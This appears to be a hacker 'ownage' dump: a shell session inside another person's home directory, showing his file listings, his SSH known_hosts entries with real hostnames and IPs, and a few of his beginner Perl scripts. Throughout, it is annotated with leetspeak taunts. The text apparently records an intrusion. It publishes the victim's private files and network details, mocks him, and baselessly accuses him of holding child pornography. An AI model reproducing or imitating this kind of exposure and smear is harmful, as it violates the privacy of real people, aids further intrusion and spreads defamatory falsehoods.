-rw-r--r-- 1 owlmanatt owlmanatt 2122727 Dec 10 2004 mulinux-14r0.tgz.gz
-rw-r--r-- 1 owlmanatt owlmanatt 646893 May 22 2005 nasm-0.98.39.tar.gz <-- 0WL K4NT 3V3N K0D3 4SM
-rw-r--r-- 1 owlmanatt owlmanatt 150068 Jun 25 13:02 ndiswrapper-1.2.tar.gz
-rw-r--r-- 1 owlmanatt owlmanatt 130346 Jul 18 22:20 owlmanat_wrdp1.sql.gz
-rw-r--r-- 1 owlmanatt owlmanatt 33454 Jul 18 22:20 owlmanat_wrdp2.sql.gz
-rw-r--r-- 1 owlmanatt owlmanatt 57481 Jul 18 22:18 owlmanat_zombie.sql.gz
-rw-r--r-- 1 owlmanatt owlmanatt 1255214 Feb 9 2005 perlbox-voice-0.08-noarch.deb
-rw-r--r-- 1 owlmanatt owlmanatt 1453676 Oct 3 2004 phpsdl2.0linux.tar.gz
-rw-r--r-- 1 owlmanatt owlmanatt 5823176 Apr 28 2005 skype_1.1.0.3-1_i386.deb
-rw-r--r-- 1 owlmanatt owlmanatt 1840376 Jan 29 2005 squirrelmail_1.2.6-1.4_all.deb
-rw-r--r-- 1 owlmanatt owlmanatt 10355480 Dec 7 2004 thunderbird-1.0.tar.gz
-rw-r--r-- 1 owlmanatt owlmanatt 489789 Feb 11 2005 trident9850.zip
-rw-r--r-- 1 owlmanatt owlmanatt 1733422 Jan 15 2005 widelands-data_build8-2_all.deb
-rw-r--r-- 1 owlmanatt owlmanatt 516252 Jan 15 2005 widelands_build8-2_i386.deb
-rw-r--r-- 1 owlmanatt owlmanatt 9624477 Feb 17 2005 www.AvaxHome.ru_-_LanguageProcessing.rar
drwxr-xr-- 12 owlmanatt owlmanatt 4096 Sep 5 22:09 zetapets_vpl_thread <-- FUCK1NG L4M3!%@$&!@
-rw-r--r-- 1 owlmanatt owlmanatt 737321 Sep 5 22:10 zetapets_vpl_thread.tar.gz
/home/owlmanatt/bash:
total 28
drwxr-xr-x 6 owlmanatt owlmanatt 4096 Sep 12 2004 .
drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 ..
drwxr-xr-x 3 owlmanatt owlmanatt 4096 Mar 4 2005 auto
drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 exploit << 4 3xpl01T wh4T!@
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 opgscript
drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 owlmanatt@vtex.dyndns.org
/home/owlmanatt/classified:
total 208
drwxr-xr-x 10 owlmanatt owlmanatt 4096 Sep 4 19:37 .
drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 ..
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Oct 24 2004 .fae
dr-xr-xr-x 2 owlmanatt owlmanatt 4096 Mar 13 2003 CF
-r-xr-xr-x 1 owlmanatt owlmanatt 61078 Sep 14 2003 Tehqueenban.bmp
drwxr-xr-x 4 owlmanatt owlmanatt 4096 Mar 12 2005 ThePlaceFinal
-r-xr-xr-x 1 owlmanatt owlmanatt 4064 Aug 13 2003 apple.gif
d--------- 2 owlmanatt owlmanatt 4096 Jul 24 13:37 art
drwxr-xr-x 3 owlmanatt owlmanatt 4096 Mar 5 2005 eclog
dr-xr-xr-x 3 owlmanatt owlmanatt 4096 Sep 17 2003 files
-r-xr-xr-x 1 owlmanatt owlmanatt 4673 Jul 22 2003 fired.gif
-r-xr-xr-x 1 owlmanatt owlmanatt 5364 Jul 23 2003 king.gif
drwxr-xr-x 10 owlmanatt owlmanatt 4096 Sep 4 19:37 logs
-r-xr-xr-x 1 owlmanatt owlmanatt 3193 Sep 6 2003 moron.gif
-r-xr-xr-x 1 owlmanatt owlmanatt 21437 Aug 28 2003 rockwaterfeaturebig.gif
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 sql
-r-xr-xr-x 1 owlmanatt owlmanatt 16887 Jul 25 2003 suck.jpg
-r-xr-xr-x 1 owlmanatt owlmanatt 28384 Aug 13 2003 thefinger.jpg
-r-xr-xr-x 1 owlmanatt owlmanatt 1925 Jul 11 2003 wtf.gif
^--- R34LLY L00KZ L1K3 S0M3 CL4SS1F13D SH1T T0 M3...
/home/owlmanatt/images:
total 12392
drwxr-xr-x 15 owlmanatt owlmanatt 4096 Oct 16 11:52 .
drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 ..
-rw-r--r-- 1 owlmanatt owlmanatt 659 Nov 29 2004 .hack_SIGN Defragmented.htm
drwxr-xr-x 4 owlmanatt owlmanatt 4096 Nov 29 2004 .hack_SIGN Defragmented_files
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 .xvpics
-rw-r--r-- 1 owlmanatt owlmanatt 347320 Feb 22 2005 2.8.1_cd_cover.png
-rw-r--r-- 1 owlmanatt owlmanatt 174278 Feb 22 2005 2.8.1_cd_label_1.png
-rw-r--r-- 1 owlmanatt owlmanatt 0 Feb 22 2005 2.8.1_cd_label_2.png
-rw-r--r-- 1 owlmanatt owlmanatt 1075651 Jan 2 2005 2004_Jan_02.png
-rw-r--r-- 1 owlmanatt owlmanatt 17844 Feb 28 2005 30003_G.gif
-rw-r--r-- 1 owlmanatt owlmanatt 104754 Mar 19 2005 Eerova_North.gif
-rw-r--r-- 1 owlmanatt owlmanatt 64 Mar 11 2005 KNOPPIX_V3.6-2004-08-16-EN.iso.md5.htm
-rw-r--r-- 1 owlmanatt owlmanatt 311953 Oct 7 2004 OwlMan10-7-04
-rw-r--r-- 1 owlmanatt owlmanatt 52482 Jun 13 16:29 Owl_moosh.jpg
-r--r--r-- 1 owlmanatt owlmanatt 248525 Jan 9 2004 Screenshot.png
-r--r--r-- 1 owlmanatt owlmanatt 195760 Dec 5 2003 Shellshot.png
-rw-r--r-- 1 owlmanatt owlmanatt 117694 Jun 8 2004 aa.bmp
-rw-r--r-- 1 owlmanatt owlmanatt 80234 Feb 3 2005 aaa3.bmp
-rw-r--r-- 1 owlmanatt owlmanatt 496678 Jun 9 2004 art.bmp
-rw-r--r-- 1 owlmanatt owlmanatt 103834 Mar 26 2005 avass.png
drwxr-xr-- 2 owlmanatt owlmanatt 4096 May 4 2005 bible
-rw-r--r-- 1 owlmanatt owlmanatt 154429 Jan 23 2005 bluething.png
-r--r--r-- 1 owlmanatt owlmanatt 77121 Dec 6 2003 board.png
-r--r--r-- 1 owlmanatt owlmanatt 1523 Nov 30 2003 bullet.jpg
-rw-r--r-- 1 owlmanatt owlmanatt 7112 Feb 19 2005 bunker.png
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Oct 8 20:50 button
-r--r--r-- 1 owlmanatt owlmanatt 5572 Dec 23 2003 cactus.png
-rw-r--r-- 1 owlmanatt owlmanatt 98236 May 14 2005 cat.oci
-r--r--r-- 1 owlmanatt owlmanatt 1084200 Dec 31 2003 catdog.jpg
drwxr-xr-- 2 owlmanatt owlmanatt 4096 Sep 6 20:14 collage
drwxr-xr-x 5 owlmanatt owlmanatt 4096 Jul 28 22:34 comic
-r--r--r-- 1 owlmanatt owlmanatt 35627 Dec 2 2003 comic.png
-rw-r--r-- 1 owlmanatt owlmanatt 10988 May 30 2004 creaturepic.gif
-rw-r--r-- 1 owlmanatt owlmanatt 798 Jan 26 2005 dc.pl.htm
-rw-r--r-- 1 owlmanatt owlmanatt 18378 Apr 3 2004 deamon.jpg
drwxr-xr-x 5 owlmanatt owlmanatt 4096 Sep 4 19:56 desktop
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Jun 16 22:14 digicam
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 ec
-rw-r--r-- 1 owlmanatt owlmanatt 20521 Feb 17 2004 excitement.jpg
-rw-r--r-- 1 owlmanatt owlmanatt 10131 Nov 16 2004 firefox.jpg
-rw-r--r-- 1 owlmanatt owlmanatt 896 Nov 5 2004 fox_blue_2.gif
-r--r--r-- 1 owlmanatt owlmanatt 25534 Nov 23 2003 fuckers.jpg
-r--r--r-- 1 owlmanatt owlmanatt 102454 Jan 3 2004 girl3.bmp
-rw-r--r-- 1 owlmanatt owlmanatt 30688 Jan 30 2005 gnome.jpg
drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 greece
-r--r--r-- 1 owlmanatt owlmanatt 14015 Jan 21 2004 greece-map.gif
-rw-r--r-- 1 owlmanatt owlmanatt 8717 Feb 14 2005 heartman.gif
-rw-r--r-- 1 owlmanatt owlmanatt 15473 Feb 14 2005 heartman.png
-r--r--r-- 1 owlmanatt owlmanatt 10787 Nov 29 2003 hitler.gif
-r--r--r-- 1 owlmanatt owlmanatt 260569 Nov 16 2003 hot.png
-rw-r--r-- 1 owlmanatt owlmanatt 1678 Nov 9 2004 ib.public.asc
drwxr-xr-- 2 owlmanatt owlmanatt 4096 Jan 6 2005 icon
-rw-r--r-- 1 owlmanatt owlmanatt 311952 Oct 7 2004 image004.ppm
-rw-r--r-- 1 owlmanatt owlmanatt 120 Aug 26 2004 insomniac6.php.png
-rw-r--r-- 1 owlmanatt owlmanatt 4318 Feb 27 2005 jackass.gif
-rw-r--r-- 1 owlmanatt owlmanatt 2200 Jun 3 2004 kat.png
-rw-r--r-- 1 owlmanatt owlmanatt 13005 Jan 9 2005 kenspa.gif
-r--r--r-- 1 owlmanatt owlmanatt 59839 Nov 23 2003 knight.jpg
-r--r--r-- 1 owlmanatt owlmanatt 213905 Jan 22 2004 knoppix-cover.png
-r--r--r-- 1 owlmanatt owlmanatt 14325 Dec 7 2003 know.jpg
-r--r--r-- 1 owlmanatt owlmanatt 20662 Dec 7 2003 know.png
-rw-r--r-- 1 owlmanatt owlmanatt 48166 May 26 2004 laurel.jpg
-r--r--r-- 1 owlmanatt owlmanatt 12462 Jan 9 2004 layout.png
-r--r--r-- 1 owlmanatt owlmanatt 34056 Jan 9 2004 layout.xcf
-rw-r--r-- 1 owlmanatt owlmanatt 62570 May 26 2004 lindsay.jpg
-rw-r--r-- 1 owlmanatt owlmanatt 1427 Nov 11 2004 linux_powered.png
-r--r--r-- 1 owlmanatt owlmanatt 4745 Dec 8 2003 linuxuser.gif
-rw-r--r-- 1 owlmanatt owlmanatt 238734 Sep 25 2004 little2.bmp
-rw-r--r-- 1 owlmanatt owlmanatt 13018 Oct 10 18:21 lj2.jpg
-r--r--r-- 1 owlmanatt owlmanatt 6092 Dec 29 2003 llama.gif
-r--r--r-- 1 owlmanatt owlmanatt 8399 Jan 21 2004 map.gif
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Oct 7 2004 me
-rw-r--r-- 1 owlmanatt owlmanatt 2988 Jul 30 2004 me.gif
-rw-r--r-- 1 owlmanatt owlmanatt 460 Nov 11 2004 mini_linux.gif
-r--r--r-- 1 owlmanatt owlmanatt 3549 Dec 16 2003 mouse.jpg
-rw-r--r-- 1 owlmanatt owlmanatt 20392 Jun 7 2004 nerdz.png
-rw-r--r-- 1 owlmanatt owlmanatt 133164 Jun 18 21:36 network.png
-rw-r--r-- 1 owlmanatt owlmanatt 31886 Jun 18 21:36 network.svg
drwxr-xr-- 2 owlmanatt owlmanatt 4096 Oct 16 10:40 newhotness
-rw-r--r-- 1 owlmanatt owlmanatt 4250 Mar 26 2005 ns.png
-rw-r--r-- 1 owlmanatt owlmanatt 413552 Mar 25 2005 ns.svg
-rw-r--r-- 1 owlmanatt owlmanatt 86472 Jun 11 2004 o1w3l_2.jpg
-rw-r--r-- 1 owlmanatt owlmanatt 1980 Jun 11 2004 o1w3l_3.png
-rw-r--r-- 1 owlmanatt owlmanatt 1397 Jun 12 17:35 oma_ava.jpg
-rw-r--r-- 1 owlmanatt owlmanatt 133590 Feb 22 2005 omgsex0r.jpg
-rw-r--r-- 1 owlmanatt owlmanatt 24632 Jun 7 2004 ow3l_1.png
-r--r--r-- 1 owlmanatt owlmanatt 21759 Nov 28 2003 owl.png
-rw-r--r-- 1 owlmanatt owlmanatt 112457 Jun 25 2004 owl1.png
-rw-r--r-- 1 owlmanatt owlmanatt 876500 Jun 26 2004 owl2.png
-rw-r--r-- 1 owlmanatt owlmanatt 23413 Jul 1 2004 owl5.png
-rwx------ 1 owlmanatt owlmanatt 1380290 Oct 16 10:41 owl_2005-10-16_big.JPG
-rw-r--r-- 1 owlmanatt owlmanatt 49251 Oct 16 11:52 owl_2005-10-16_small.JPG
-r--r--r-- 1 owlmanatt owlmanatt 88161 Nov 28 2003 owlbanner.png
-rw-r--r-- 1 owlmanatt owlmanatt 1346740 Feb 22 2005 penguin_gear.jpg
-rw-r--r-- 1 owlmanatt owlmanatt 1347 Nov 5 2004 phppow.gif
-rw-r--r-- 1 owlmanatt owlmanatt 14539 Oct 10 18:23 pic_aboutus_entry.jpg
-r--r--r-- 1 owlmanatt owlmanatt 141371 Nov 26 2003 plug.png
-rw-r--r-- 1 owlmanatt owlmanatt 5134 Jan 5 2005 poland_banner60.png
-rw-r--r-- 1 owlmanatt owlmanatt 7663 Jan 5 2005 poland_banner90.png
-rw-r--r-- 1 owlmanatt owlmanatt 310097 Oct 3 2004 rotsnake.gif
-r--r--r-- 1 owlmanatt owlmanatt 40088 Dec 31 2003 show
-rw-r--r-- 1 owlmanatt owlmanatt 316 Mar 21 2005 test.gif
-rw-r--r-- 1 owlmanatt owlmanatt 526 Mar 21 2005 test.png
-rw-r--r-- 1 owlmanatt owlmanatt 40280 Oct 10 18:02 totemT.gif
-rw-r--r-- 1 owlmanatt owlmanatt 21576 Oct 3 2004 tux
-rw-r--r-- 1 owlmanatt owlmanatt 15811 Oct 29 2004 tux.gif
-rw-r--r-- 1 owlmanatt owlmanatt 47245 Oct 3 2004 tux.png
-r--r--r-- 1 owlmanatt owlmanatt 89 Dec 8 2003 watch accounts.txt
-r--r--r-- 1 owlmanatt owlmanatt 16741 Nov 29 2003 ww1.JPG
-rw-r--r-- 1 owlmanatt owlmanatt 452535 Feb 15 2004 xine_snapshot-1.png
^
--- D0 N0T B3 F00L3D BY TH3 D3C3PT1V3 N4M3Z 0F TH3Z3 1M4G3Z. TH3Y 4R3 4CTU4LLY
--- CH1LD P0RN. 1T 4PP34RZ 0WL 1Z A TRUZT3D K0UR13R 0F CH1LD P0RN0GR4PHY.
/home/owlmanatt/novel: <--- L4M3 M0TH3R FUK1NG N0V3L!@!@#
total 1712
drwxr-xr-x 6 owlmanatt owlmanatt 4096 Nov 25 14:59 .
drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 ..
drwxr-xr-x 5 owlmanatt owlmanatt 4096 Feb 5 2005 04
-rw-r--r-- 1 owlmanatt owlmanatt 512087 Nov 25 14:58 mindwar.abw
-rw-r--r-- 1 owlmanatt owlmanatt 501668 Nov 25 14:58 mindwar.doc
-rw-r--r-- 1 owlmanatt owlmanatt 387549 Nov 25 14:58 mindwar.html
-rw-r--r-- 1 owlmanatt owlmanatt 297565 Nov 25 14:59 mindwar.txt
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Oct 10 18:51 misc
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Oct 29 10:56 planning
drwxr-xr-- 2 owlmanatt owlmanatt 4096 Oct 30 23:11 prewrites
^
--- R3M1NDZ M3 0F X1L3@H4CKM4N14
--- TH1Z 1Z N0T A G00D TH1NG.
/home/owlmanatt/php:
total 280
drwxr-xr-x 29 owlmanatt owlmanatt 4096 Jul 19 21:06 .
drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 ..
-rw-r--r-- 1 owlmanatt owlmanatt 1983 Oct 25 2004 Eimi.php
-rw-r--r-- 1 owlmanatt owlmanatt 1831 Oct 25 2004 Eimi.php~
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 Lock
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Jan 2 2005 OrkExp
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 OwlFlux
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 OwlTracker
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 PetProject
drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 blog
drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 blogUnknown
-rw-r--r-- 1 owlmanatt owlmanatt 1645 Aug 3 2004 bofh.php
-rw-r--r-- 1 owlmanatt owlmanatt 1191 Oct 28 2004 calc.php
-rw-r--r-- 1 owlmanatt owlmanatt 1182 Oct 28 2004 calc.php~
-rw-r--r-- 1 owlmanatt owlmanatt 1950 Apr 24 2004 cheater.php
drwxr-xr-x 5 owlmanatt owlmanatt 4096 Sep 12 2004 cp2
drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 crown
drwxr-xr-x 6 owlmanatt owlmanatt 4096 Sep 12 2004 crown_2005.03.09
drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 cybit
-rw-r--r-- 1 owlmanatt owlmanatt 402 Aug 24 2004 export.php
-rw-r--r-- 1 owlmanatt owlmanatt 10261 Aug 3 2004 fileeditor.php
-rw-r--r-- 1 owlmanatt owlmanatt 458 Sep 22 2004 fortuned.php
-rw-r--r-- 1 owlmanatt owlmanatt 12888 Dec 31 2004 functions.inc.php
-rw-r--r-- 1 owlmanatt owlmanatt 3589 Apr 22 2004 globals.php
-rw-r--r-- 1 owlmanatt owlmanatt 251 Feb 19 2005 grue.css
-rw-r--r-- 1 owlmanatt owlmanatt 250 Feb 19 2005 grue.css~
-rw-r--r-- 1 owlmanatt owlmanatt 4737 Feb 19 2005 grue.php
-rw-r--r-- 1 owlmanatt owlmanatt 4697 Feb 19 2005 grue.php~
drwxr-xr-x 4 owlmanatt owlmanatt 4096 Sep 12 2004 hackbsd <-- W4ZN'T TAL0N A P4RT 0F TH1Z L4M3 H4CK3R G4NG?
-rw-r--r-- 1 owlmanatt owlmanatt 13463 Apr 23 2004 header.php
-rw-r--r-- 1 owlmanatt owlmanatt 11709 Jun 16 2004 inc.php
-rw-r--r-- 1 owlmanatt owlmanatt 206 Apr 22 2004 index.php
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Apr 24 2005 insom
-rw-r--r-- 1 owlmanatt owlmanatt 6333 Jun 3 2004 inventory.php
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 irc
drwxr-xr-x 9 owlmanatt owlmanatt 4096 Sep 12 2004 kpfinal
-rw-r--r-- 1 owlmanatt owlmanatt 401 Mar 6 2005 login.html
-rw-r--r-- 1 owlmanatt owlmanatt 44 Jun 23 22:09 md5.php
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Jan 23 2005 milli
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 misc
-rw-r--r-- 1 owlmanatt owlmanatt 267 Oct 28 2004 moon.php
-rw-r--r-- 1 owlmanatt owlmanatt 242 Nov 2 2004 nanowrimo.php
-rw-r--r-- 1 owlmanatt owlmanatt 243 Nov 2 2004 nanowrimo.php~
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 nerdz <-- nerdz: 0WLM4N4TT - UB3RUS3R - 1NF1N1TYB
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 nixsec <-- N1XS3C 1Z FUQQ1NG L4M3 4ND D34D. K1LL3D BY H0NO. G3T 0V3R 1T Y0U L0Z3RZ.
drwxr-xr-x 7 owlmanatt owlmanatt 4096 Sep 12 2004 owl
drwxr-xr-x 3 owlmanatt owlmanatt 4096 Sep 12 2004 owlforum
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Jan 26 2005 owlog2
drwxr-xr-x 5 owlmanatt owlmanatt 4096 Sep 12 2004 phreaksite
-rw-r--r-- 1 owlmanatt owlmanatt 1644 Jun 27 19:12 safetybox.php
-rw-r--r-- 1 owlmanatt owlmanatt 1699 Jan 6 2005 seele.php
-rw-r--r-- 1 owlmanatt owlmanatt 1701 Jan 6 2005 seele.php~
drwxr-xr-x 4 owlmanatt owlmanatt 4096 Sep 12 2004 shaim
drwxr-xr-x 3 owlmanatt owlmanatt 4096 Jan 9 2005 tiko
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 xeno
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 xml
/home/owlmanatt/scripts:
total 6924
drwxr-xr-x 3 owlmanatt owlmanatt 4096 Jul 19 21:03 .
drwx------ 138 owlmanatt owlmanatt 8192 Nov 30 21:32 ..
-rwxr-xr-x 1 owlmanatt owlmanatt 205 May 5 2005 auto
-rw-r--r-- 1 owlmanatt owlmanatt 7022390 Jan 15 2005 et-linux-2.56-update.x86.run
-rwxr-xr-x 1 root root 3394 Jan 29 2005 firewall.bsh
-r-xr-xr-x 1 owlmanatt owlmanatt 536 Dec 9 2003 leif.pl
-r--r--r-- 1 owlmanatt owlmanatt 586 Dec 30 2003 mdtrip
drwxr-xr-x 2 owlmanatt owlmanatt 4096 Sep 12 2004 python
-rw-r--r-- 1 owlmanatt owlmanatt 11444 Aug 3 2004 register.php
-r--r--r-- 1 owlmanatt owlmanatt 285 Nov 23 2003 script
-r--r--r-- 1 owlmanatt owlmanatt 449 Dec 5 2003 shaim.c <-- H4H4H4 WH4T 4 F41LUR3 0F A PR0J3KT BY N0N3 0TH3R TH4N N1XS3C/R3FLUX.
owlmanatt@bell:/home/owlmanatt$ cd /home/owlmanatt/
owlmanatt@bell:/home/owlmanatt$ cat .ssh/known_hosts
ecritters.biz,216.127.80.69 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAsZUOeKP2MJcCCWRk0RPTF0deHRaHyAIeUs40tgEKaAX78JQuv4X97khIIq0DPUUOOvXoL5ISJtmnZtO18kcIpWXt8rEBMWxIi0yMsUIU6re9GGFZjZVRzCdaaguIaXOrHFmd8Qi5X0ZYjZBYjnGu5dpNTb3n1dwIF0CDSDoCmy0=
saranac.dsl.net,209.87.64.73 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzrfKyN8lffRHYVzj9mrd7O8RR2NpIRq9wrbxwNthddu0pfR3SEQaDE8BdIlnlsqzZIA7l6uaW4+fMBNEBmlGakdyhQc+mlDyfD3E0uVdSryKcA45Dawt3XizCZt2x4wt1pGv1EomWrNyry32XRElbDaoKLyJok7GKQMzRhcHLEs=
enterprise.whereistux.com,65.85.161.103 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAugeDBf11tEFv4Ug+kGbL4jBhRkzYZfGbOlRyHQKjJmO2QHGfzM2KwYRldax0fR7b+Evl5tUXeFxWHqRHj6eVC4lb0OGQA/chaq/tpYmnjfR3VRdEpx7ciUdrIxl3l3727vNm9T649BBowGqWUkYyplvlVy03yc5er33i7L2TtTc=
owlmanatt.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAugeDBf11tEFv4Ug+kGbL4jBhRkzYZfGbOlRyHQKjJmO2QHGfzM2KwYRldax0fR7b+Evl5tUXeFxWHqRHj6eVC4lb0OGQA/chaq/tpYmnjfR3VRdEpx7ciUdrIxl3l3727vNm9T649BBowGqWUkYyplvlVy03yc5er33i7L2TtTc=
cybitures.com,64.20.39.18 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAxYgPdmrZUlhZj2Ca9SQF6BmD5f/Wzo2IHUN9BJZ0oZBnl1QX9XLaGqGIMb5A5+fGZ7vcBlERbVM6SxL9/3vm2pvnca2Eyg74El9pimynjPHMAj5yLzT4zLBt5Am/8OJCTO17PIinJQLI4p+tzJC8bzGdxHeQl1mRJ2Q5IovTKw8=
infinityb.canada-pwns.info,205.206.186.244 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA3IuH0rqYJ/8zj1rfFk21E4g89Ylo2sd7Cho1+iUhUCZW/o/IDt6aEPagsOphn1vgFct/FJSspEnVl70gulacEPVU03a/lrquB1y1j5GgdaqDIxX8w+Lz0x+xEJ6eGQ0nSstGlbyJ7hdc2xeJWuR/1aV+x76I+As0F5/g6KBgHZ0=
kato,172.16.1.36 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6NPiNFALclfFIRA3AUFepAGcUTpqV7uE2ZQwG98z1i3a6Jwmvj8+aAwOM8GxzZyD3YqSkkatrHeimADVeflmJuWtI7+z0MAou+CsoNnBPnOZJ7LST45nLfwVDehwPNZPf2xiZWcgLvakCaKW2lETzh/nLLTXArN5SoLcYLksMds=
whereistux.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAugeDBf11tEFv4Ug+kGbL4jBhRkzYZfGbOlRyHQKjJmO2QHGfzM2KwYRldax0fR7b+Evl5tUXeFxWHqRHj6eVC4lb0OGQA/chaq/tpYmnjfR3VRdEpx7ciUdrIxl3l3727vNm9T649BBowGqWUkYyplvlVy03yc5er33i7L2TtTc=
ns1.whereistux.com,65.85.161.99 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEArDgzPUy7bAptTTvSg9NkhfFgaP4JGmo0Mw28hn2Nmznf17JJSYOTOpIDbP49NNT5aR6INBGng8KkAwu/uSggG5Ty9IuJBC5UUPYgSUQWgieFie/+eJCcFvxVDjD78rZ8xvQyYjAhWQw+q2BbIc3j8TQto2y8w1slx9XIGYzT8yE=
owly.homelinux.net,64.252.174.211 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6NPiNFALclfFIRA3AUFepAGcUTpqV7uE2ZQwG98z1i3a6Jwmvj8+aAwOM8GxzZyD3YqSkkatrHeimADVeflmJuWtI7+z0MAou+CsoNnBPnOZJ7LST45nLfwVDehwPNZPf2xiZWcgLvakCaKW2lETzh/nLLTXArN5SoLcYLksMds=
|1|F+ouHUhEUg3+NtTAQdjO7NLaxXk=|wmhtbCYcfbK/lI8wCtoiVuKmJvg= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAti1/6OTdGmZ2ta5Qdjegj2XJOaQnOd0tg68rbci8mj4YiA9PrChik/SXmpJamKOneaG78DmyR3MWhul6w+s3M1gHbzzXCBM5W+EN7VfpdrHMF8PSM+cryAKXpnsUXKyvCqrSVn1Yc7chSLFbS8eXvrembzoUc5Xu9ebHiVKg2U8=
|1|hC9rQgnhAfLcmM+d5GAV82z+5oY=|jfzmtKo+jFJZ1MHyvOApmmbADyo= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAti1/6OTdGmZ2ta5Qdjegj2XJOaQnOd0tg68rbci8mj4YiA9PrChik/SXmpJamKOneaG78DmyR3MWhul6w+s3M1gHbzzXCBM5W+EN7VfpdrHMF8PSM+cryAKXpnsUXKyvCqrSVn1Yc7chSLFbS8eXvrembzoUc5Xu9ebHiVKg2U8=
|1|T1nDjQyDPep5YFX26sanGI6phZM=|gaCwh0pUc1WOr0z6xxnEEjEcWHE= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAw1Ge23DFbrCQpHhL8tFpcvF1guMjlDE//hxiWzOSMstd8gX/K583WVsA1K6bXH6UMoq7kZUD/BA1/okeNb+EUWdZM6T+5I0Hx70ig2CF1Lg5IJhQkb/UdUX/eXEVdPJRF7dBEEFehNxtxjPislHj3iK999yFBE3+E0PzZlT0lKM=
|1|YCyIfoZnqgqMdKczlZT826SUDXw=|JW+fGwiiKcnGTMCKHATNYnzDwvk= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAw1Ge23DFbrCQpHhL8tFpcvF1guMjlDE//hxiWzOSMstd8gX/K583WVsA1K6bXH6UMoq7kZUD/BA1/okeNb+EUWdZM6T+5I0Hx70ig2CF1Lg5IJhQkb/UdUX/eXEVdPJRF7dBEEFehNxtxjPislHj3iK999yFBE3+E0PzZlT0lKM=
|1|ghyfQff8/TSN7iqa3VOQXMI8ApQ=|Z1bL8vArg0ZTXJY6YVUB/pIA/Mo= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6NPiNFALclfFIRA3AUFepAGcUTpqV7uE2ZQwG98z1i3a6Jwmvj8+aAwOM8GxzZyD3YqSkkatrHeimADVeflmJuWtI7+z0MAou+CsoNnBPnOZJ7LST45nLfwVDehwPNZPf2xiZWcgLvakCaKW2lETzh/nLLTXArN5SoLcYLksMds=
bell ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA590smJCAKTEDv7apvthabDd0FocMFr48QiRV4CsNJHHtbzCMINStGK1urOtoU/uHhUNKb4ImZPZqrafbtYwZfSvvM9ePKoAfOaHibgKZjCGwcVuVq1l+/h8JPfw5CV2aoMhzxLXCR6LQMCrHiAwx1+LQtoFe8WPRt1JLB+yaG9c=
owlmanatt@bell:/home/owlmanatt$ cat perl/test.pl <--- L3TZ S33 WH4T K1ND 0F 0HD4Y H3 HAZ
#!/usr/bin/perl
#Weird, random script.
print "What is the message you wish to print?\n";
chomp($mess = <STDIN>);
print "How many times to print it?";
chomp($times = <STDIN>);
if(! $mess) {
print "Fool! Enter a message!\n";
}
else {
if ($times <= 0) {
print "Llama, put in a REAL number!\n";
}
else {
$mess .= "\n";
print $mess x $times;
}
}
owlmanatt@bell:/home/owlmanatt$ cat perl/n00b.pl
#!/usr/bin/perl
print "Hello, World!\n";
print "ls";
^
--- 0H FUq B4TM4N H3 W1LL T4KE 0V3R TH3 W0RLD W1TH C0D3 LIK3 D1S
owlmanatt@bell:/home/owlmanatt$ cd stuff
owlmanatt@bell:/home/owlmanatt/stuff$ cat stupid.txt
iji iji iji iji iji iji jtiji iji iji iji iji iji ij
iji iji iji iji iji ijjDMNQti iji iji iji iji iji ij
iji iji iji iji iji cXMNMNMNQjiji iji iji iji iji ij
iji iji iji iji ijcSMNMNMNMNHJiji iji iji iji iji ij
